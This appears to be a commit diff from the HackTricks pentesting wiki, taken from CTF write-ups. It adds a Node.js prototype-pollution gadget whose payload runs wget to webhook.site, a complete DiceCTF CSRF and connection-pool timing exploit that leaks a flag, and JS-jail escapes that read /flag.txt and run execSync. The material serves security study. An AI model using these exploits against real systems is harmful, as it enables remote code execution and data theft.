mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 20:23:18 +00:00
GITBOOK-4028: change request with no subject merged in GitBook
This commit is contained in:
parent
cfc006dba6
commit
751055cd29
4 changed files with 324 additions and 13 deletions
|
@ -649,7 +649,7 @@
|
|||
* [XSS Tools](pentesting-web/xss-cross-site-scripting/xss-tools.md)
|
||||
* [XSSI (Cross-Site Script Inclusion)](pentesting-web/xssi-cross-site-script-inclusion.md)
|
||||
* [XS-Search/XS-Leaks](pentesting-web/xs-search.md)
|
||||
* [Connection Pool Example](pentesting-web/xs-search/connection-pool-example.md)
|
||||
* [Connection Pool Examples](pentesting-web/xs-search/connection-pool-example.md)
|
||||
* [Connection Pool by Destination Example](pentesting-web/xs-search/connection-pool-by-destination-example.md)
|
||||
* [Cookie Bomb + Onerror XS Leak](pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md)
|
||||
* [URL Max Length - Client Side](pentesting-web/xs-search/url-max-length-client-side.md)
|
||||
|
|
|
@ -7,7 +7,7 @@
|
|||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
@ -678,6 +678,29 @@ fork('/path/to/anything');
|
|||
{% endtab %}
|
||||
{% endtabs %}
|
||||
|
||||
#### Relative require - 3
|
||||
|
||||
Similar to the previous one, this was found in [**this writeup**](https://blog.huli.tw/2022/12/26/en/ctf-2022-web-js-summary/#balsn-ctf-2022-2linenodejs).
|
||||
|
||||
```javascript
|
||||
// Requiring /opt/yarn-v1.22.19/preinstall.js
|
||||
Object.prototype["data"] = {
|
||||
exports: {
|
||||
".": "./preinstall.js"
|
||||
},
|
||||
name: './usage'
|
||||
}
|
||||
Object.prototype["path"] = '/opt/yarn-v1.22.19'
|
||||
Object.prototype.shell = "node"
|
||||
Object.prototype["npm_config_global"] = 1
|
||||
Object.prototype.env = {
|
||||
"NODE_DEBUG": "console.log(require('child_process').execSync('wget${IFS}https://webhook.site?q=2').toString());process.exit()//",
|
||||
"NODE_OPTIONS": "--require=/proc/self/environ"
|
||||
}
|
||||
|
||||
require('./usage.js')
|
||||
```
|
||||
|
||||
## VM Gadgets
|
||||
|
||||
In the paper [https://arxiv.org/pdf/2207.11171.pdf](https://arxiv.org/pdf/2207.11171.pdf) is also indicated that the control of **`contextExtensions`** from some methods of the **`vm`** library could be used as a gadget.\
|
||||
|
@ -706,7 +729,7 @@ In [**this commit**](https://github.com/nodejs/node/commit/0313102aaabb49f78156c
|
|||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
# Connection Pool Example
|
||||
# Connection Pool Examples
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -7,11 +7,13 @@
|
|||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
## Sekaictf2022 - safelist
|
||||
|
||||
In the [**Sekaictf2022 - safelist**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/safelist/solution) challenge, [**@Strellic\_**](https://twitter.com/Strellic\_) gives an example of how to use a **variation** of the **Connection Pool** technique to perform a **XS-Leak**.
|
||||
|
||||
In this challenge, the goal is to exfiltrate a flag that will appear in the bots web session inside a post. These are the assets the attacker has:
|
||||
|
@ -294,6 +296,222 @@ Same tactic but different code from [https://blog.huli.tw/2022/10/05/en/sekaictf
|
|||
</html>
|
||||
```
|
||||
|
||||
## DiceCTF 2022 - carrot
|
||||
|
||||
In this case the first step of the exploit was to abuse a CSRF to modify the page where the flag is contained so it has **much more content** (and therefore loading it takes more time), and then **abuse the connection pool to measure the time it takes to access the page** that could be potentially having the flag.
|
||||
|
||||
In the exploit you can see:
|
||||
|
||||
* Abuse CSRF
|
||||
* Occupy all the sockets but 1
|
||||
* Calibrate the response
|
||||
* Start bruteforcing by accessing the potential page with the flag
|
||||
* The potential page will be accessed and immediately an attackers controlled URL will also be accessed to check how much time both requests take.
|
||||
|
||||
```html
|
||||
<h1>DiceCTF 2022 web/carrot</h1>
|
||||
|
||||
<p>Step 1: CSRF the admin user, to set a super long title for the flag note (LAX + POST form only possible for 2 minutes after cookies is created)</p>
|
||||
<button onclick="csrf()">do csrf</button>
|
||||
<p>Step 2: XS-Search with <a href="https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/">connection-pool timing leak</a>, we have to use window.open (LAX cookie)</p>
|
||||
|
||||
<button onclick="popunder()">open popup</button>
|
||||
<button onclick="exhaust_sockets()">open 255 connections</button>
|
||||
<button onclick="oracle('dice{abc')">test search "abc" (slow)</button>
|
||||
<button onclick="oracle('dice{xxx')">test search "xxx" (fast)</button>
|
||||
<br>
|
||||
<br>
|
||||
<h2 id=output></h2>
|
||||
<br>
|
||||
<form id=x action="" method="POST" style="display:none;">
|
||||
<input type="text" name="title" placeholder="title">
|
||||
<br><br>
|
||||
<input type="number" name="priority" placeholder="priority" value=9999>
|
||||
<br><br>
|
||||
<textarea name="content" placeholder="content" rows="5" cols="20"></textarea>
|
||||
<br><br>
|
||||
<input type="submit" value="submit">
|
||||
</form>
|
||||
|
||||
<script>
|
||||
|
||||
// this is send is used as logging
|
||||
LOG = 'Starting'
|
||||
// 255 in normal chrome, 99 in headless
|
||||
SOCKETLIMIT = 255;
|
||||
// default
|
||||
TIMELIMIT = 800;
|
||||
INSTANCE = ''
|
||||
MYSERVER = `example.com`
|
||||
|
||||
const sleep = (ms) => {
|
||||
return new Promise(resolve => {
|
||||
setTimeout(resolve, ms);
|
||||
});
|
||||
}
|
||||
|
||||
const time_fetch = async() => {
|
||||
let test_server_url = `https://${MYSERVER}/?${LOG}`;
|
||||
let start = window.performance.now();
|
||||
try {
|
||||
await fetch(test_server_url, {
|
||||
mode: 'no-cors'
|
||||
});
|
||||
} catch (e) {
|
||||
console.log(e);
|
||||
}
|
||||
let end = window.performance.now();
|
||||
return end - start;
|
||||
}
|
||||
|
||||
const fetch_sleep_long = (i) => {
|
||||
// 40s sleep
|
||||
return fetch(`https://${i}.${MYSERVER}/40sleep`, {
|
||||
mode: 'no-cors'
|
||||
});
|
||||
}
|
||||
|
||||
const fetch_sleep_short = (i) => {
|
||||
// 0.25s sleep
|
||||
return fetch(`https://${i}.${MYSERVER}/ssleep`, {
|
||||
mode: 'no-cors'
|
||||
});
|
||||
}
|
||||
|
||||
const block_socket = async (i) => {
|
||||
fetch_sleep_long(i);
|
||||
// needed?
|
||||
await sleep(0);
|
||||
}
|
||||
|
||||
const exhaust_sockets = async() => {
|
||||
let i = 0
|
||||
for (; i < SOCKETLIMIT; i++) {
|
||||
block_socket(i);
|
||||
}
|
||||
console.log(`Used ${i} connections`);
|
||||
}
|
||||
|
||||
const timeit = async (url, popup) => {
|
||||
return new Promise(async (r) => {
|
||||
|
||||
popup.location = url;
|
||||
// needed?
|
||||
await sleep(50)
|
||||
|
||||
let val = await time_fetch()
|
||||
r(val)
|
||||
});
|
||||
}
|
||||
|
||||
// const alphabet = '_abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-}!"#$%&\'()*+,-./:;<=>?@[\\]^`|~{'.split('');
|
||||
const alphabet = 'abcdefghijklmnopqrstuvwxyz}_'.split('');
|
||||
// const alphabet = 'abcdef}'.split('');
|
||||
|
||||
const oracle = async (search) => {
|
||||
let url = `https://carrot-${INSTANCE}.mc.ax/tasks?search=${search}`
|
||||
let t = await timeit(url, WINBG)
|
||||
|
||||
LOG = `${search}:${t}`
|
||||
console.log(`${search}:${t}`)
|
||||
|
||||
return t > TIMELIMIT
|
||||
}
|
||||
|
||||
const brute = async (flag) => {
|
||||
for (const char of alphabet) {
|
||||
if (await oracle(flag + char)) {
|
||||
return char;
|
||||
}
|
||||
}
|
||||
return false;
|
||||
}
|
||||
|
||||
const calibrate = async () => {
|
||||
return new Promise(async (r) => {
|
||||
// slow
|
||||
let url1 = `https://carrot-${INSTANCE}.mc.ax/tasks?search=dice{`
|
||||
let t1 = await timeit(url1, WINBG)
|
||||
console.log(`slow:${t1}`)
|
||||
// fast
|
||||
let url2 = `https://carrot-${INSTANCE}.mc.ax/tasks?search=XXXXXXXXXX`
|
||||
let t2 = await timeit(url2, WINBG)
|
||||
console.log(`fast:${t2}`)
|
||||
return r((t1 + t2) / 2)
|
||||
});
|
||||
|
||||
}
|
||||
|
||||
const exploit = async(flag = '') => {
|
||||
console.log('Starting')
|
||||
// dont go to fast plz :)
|
||||
console.log(`waiting 3s`)
|
||||
await sleep(3000)
|
||||
// exaust sockets
|
||||
await exhaust_sockets()
|
||||
await sleep(2000)
|
||||
LOG = `Calibrating`
|
||||
TIMELIMIT = await calibrate()
|
||||
LOG = `TIMELIMIT:${TIMELIMIT}`
|
||||
console.log(`timelimit:${TIMELIMIT}`)
|
||||
await sleep(2000)
|
||||
let last;
|
||||
while (true) {
|
||||
last = await brute(flag);
|
||||
if (last === false) {
|
||||
return flag;
|
||||
}
|
||||
else {
|
||||
flag += last;
|
||||
output.innerText = flag;
|
||||
if(last === '}'){
|
||||
return flag
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
const popunder = () => {
|
||||
if (window.opener) {
|
||||
WINBG = window.opener
|
||||
}
|
||||
else {
|
||||
WINBG = window.open(location.href, target="_blank")
|
||||
location = `about:blank`
|
||||
}
|
||||
}
|
||||
|
||||
const csrf = async () => {
|
||||
x.action = `https://carrot-${INSTANCE}.mc.ax/edit/0`
|
||||
x.title.value = "A".repeat(1000000)
|
||||
x.submit()
|
||||
}
|
||||
|
||||
window.onload = () => {
|
||||
let p = new URL(location).searchParams;
|
||||
if(!p.has('i')){
|
||||
console.log(`no INSTANCE`)
|
||||
return
|
||||
}
|
||||
INSTANCE = p.get('i')
|
||||
// step 1
|
||||
if(p.has('csrf')){
|
||||
csrf()
|
||||
return
|
||||
}
|
||||
// step 2
|
||||
if (p.has('exploit')) {
|
||||
// window open is ok in headless :)
|
||||
popunder()
|
||||
|
||||
exploit('dice{')
|
||||
}
|
||||
}
|
||||
</script>
|
||||
```
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
@ -301,7 +519,7 @@ Same tactic but different code from [https://blog.huli.tw/2022/10/05/en/sekaictf
|
|||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -196,7 +196,7 @@ Some **examples**:
|
|||
|
||||
When your input is reflected **inside the HTML page** or you can escape and inject HTML code in this context the **first** thing you need to do if check if you can abuse `<` to create new tags: Just try to **reflect** that **char** and check if it's being **HTML encoded** or **deleted** of if it is **reflected without changes**. **Only in the last case you will be able to exploit this case**.\
|
||||
For this cases also **keep in mind** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\
|
||||
_**Note: A HTML comment can be closed using\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\***** ****`-->`**** ****or \*\*\*\*****`--!>`**_
|
||||
_**Note: A HTML comment can be closed using**** ****`-->`**** ****or**** ****`--!>`**_
|
||||
|
||||
In this case and if no black/whitelisting is used, you could use payloads like:
|
||||
|
||||
|
@ -964,7 +964,7 @@ const char* const kSupportedJavascriptTypes[] = {
|
|||
The answer is:
|
||||
|
||||
* **module** (default, nothing to explain)
|
||||
* \*\*\*\*[**webbundle**](https://web.dev/web-bundles/): Web Bundles is a feature that you can package a bunch of data (HTML, CSS, JS…) together into a **`.wbn`** file.
|
||||
* [**webbundle**](https://web.dev/web-bundles/): Web Bundles is a feature that you can package a bunch of data (HTML, CSS, JS…) together into a **`.wbn`** file.
|
||||
|
||||
```html
|
||||
<script type="webbundle">
|
||||
|
@ -976,7 +976,7 @@ The answer is:
|
|||
The resources are loaded from the source .wbn, not accessed via HTTP
|
||||
```
|
||||
|
||||
* \*\*\*\*[**importmap**](https://github.com/WICG/import-maps)**:** Allows to improve the import syntax
|
||||
* [**importmap**](https://github.com/WICG/import-maps)**:** Allows to improve the import syntax
|
||||
|
||||
```html
|
||||
<script type="importmap">
|
||||
|
@ -997,7 +997,7 @@ import { partition } from "lodash";
|
|||
|
||||
This behaviour was used in [**this writeup**](https://github.com/zwade/yaca/tree/master/solution) to remap a library to eval to abuse it can trigger XSS.
|
||||
|
||||
* \*\*\*\*[**speculationrules**](https://github.com/WICG/nav-speculation)**:** This feature is mainly to solve some problems caused by pre-rendering. It works like this:
|
||||
* [**speculationrules**](https://github.com/WICG/nav-speculation)**:** This feature is mainly to solve some problems caused by pre-rendering. It works like this:
|
||||
|
||||
```html
|
||||
<script type="speculationrules">
|
||||
|
@ -1050,7 +1050,11 @@ For example in [**this writeup**](https://gitea.nitowa.xyz/nitowa/PlaidCTF-YACA)
|
|||
|
||||
### Chrome Cache to XSS
|
||||
|
||||
### XS Jails
|
||||
{% content-ref url="chrome-cache-to-xss.md" %}
|
||||
[chrome-cache-to-xss.md](chrome-cache-to-xss.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### XS Jails Escape
|
||||
|
||||
If you are only have a limited set of chars to use, check these other valid solutions for XSJail problems:
|
||||
|
||||
|
@ -1085,6 +1089,72 @@ with(this)
|
|||
// https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE
|
||||
```
|
||||
|
||||
If **everything is undefined** before executing untrusted code (like in [**this writeup**](https://blog.huli.tw/2022/02/08/en/what-i-learned-from-dicectf-2022/#miscx2fundefined55-solves)) it's possible to generate useful objects "out of nothing" to abuse the execution of arbitrary untrusted code:
|
||||
|
||||
* Using import()
|
||||
|
||||
```javascript
|
||||
// although import "fs" doesn’t work, import('fs') does.
|
||||
import("fs").then(m=>console.log(m.readFileSync("/flag.txt", "utf8")))
|
||||
```
|
||||
|
||||
* Accessing `require` indirectly
|
||||
|
||||
[According to this](https://stackoverflow.com/questions/28955047/why-does-a-module-level-return-statement-work-in-node-js/28955050#28955050) modules are wrapped by Node.js within a function, like this:
|
||||
|
||||
```javascript
|
||||
(function (exports, require, module, __filename, __dirname) {
|
||||
// our actual module code
|
||||
});
|
||||
```
|
||||
|
||||
Therefore, if from that module we can **call another function**, it's possible to use `arguments.callee.caller.arguments[1]` from that function to access **`require`**: 
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```javascript
|
||||
(function(){return arguments.callee.caller.arguments[1]("fs").readFileSync("/flag.txt", "utf8")})()
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
In a similar way to the previous example, it's possible to **use error handlers** to access the **wrapper** of the module and get the **`require`** function:
|
||||
|
||||
```javascript
|
||||
try {
|
||||
null.f()
|
||||
} catch (e) {
|
||||
TypeError = e.constructor
|
||||
}
|
||||
Object = {}.constructor
|
||||
String = ''.constructor
|
||||
Error = TypeError.prototype.__proto__.constructor
|
||||
function CustomError() {
|
||||
const oldStackTrace = Error.prepareStackTrace
|
||||
try {
|
||||
Error.prepareStackTrace = (err, structuredStackTrace) => structuredStackTrace
|
||||
Error.captureStackTrace(this)
|
||||
this.stack
|
||||
} finally {
|
||||
Error.prepareStackTrace = oldStackTrace
|
||||
}
|
||||
}
|
||||
function trigger() {
|
||||
const err = new CustomError()
|
||||
console.log(err.stack[0])
|
||||
for (const x of err.stack) {
|
||||
// use x.getFunction() to get the upper function, which is the one that Node.js adds a wrapper to, and then use arugments to get the parameter
|
||||
const fn = x.getFunction()
|
||||
console.log(String(fn).slice(0, 200))
|
||||
console.log(fn?.arguments)
|
||||
console.log('='.repeat(40))
|
||||
if ((args = fn?.arguments)?.length > 0) {
|
||||
req = args[1]
|
||||
console.log(req('child_process').execSync('id').toString())
|
||||
}
|
||||
}
|
||||
}
|
||||
trigger()
|
||||
```
|
||||
|
||||
### Obfuscation & Advanced Bypass
|
||||
|
||||
* **Different obfuscations in one page:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/)
|
||||
|
@ -1359,9 +1429,9 @@ You can also use: [https://xsshunter.com/](https://xsshunter.com)
|
|||
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
|
||||
```
|
||||
|
||||
### Find Hidden Content
|
||||
### Regex - Access Hidden Content
|
||||
|
||||
From [**this writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-piyosay) it's possible to learn that even if some values dissapear from JS, it's still possible to find them in JS attributtes in different objects. For example, an input of a REGEX is still possible to find it after the value of the input of the regex was removed:
|
||||
From [**this writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-piyosay) it's possible to learn that even if some values disappear from JS, it's still possible to find them in JS attributes in different objects. For example, an input of a REGEX is still possible to find it after the value of the input of the regex was removed:
|
||||
|
||||
```javascript
|
||||
// Do regex with flag
|
||||
|
|
Loading…
Reference in a new issue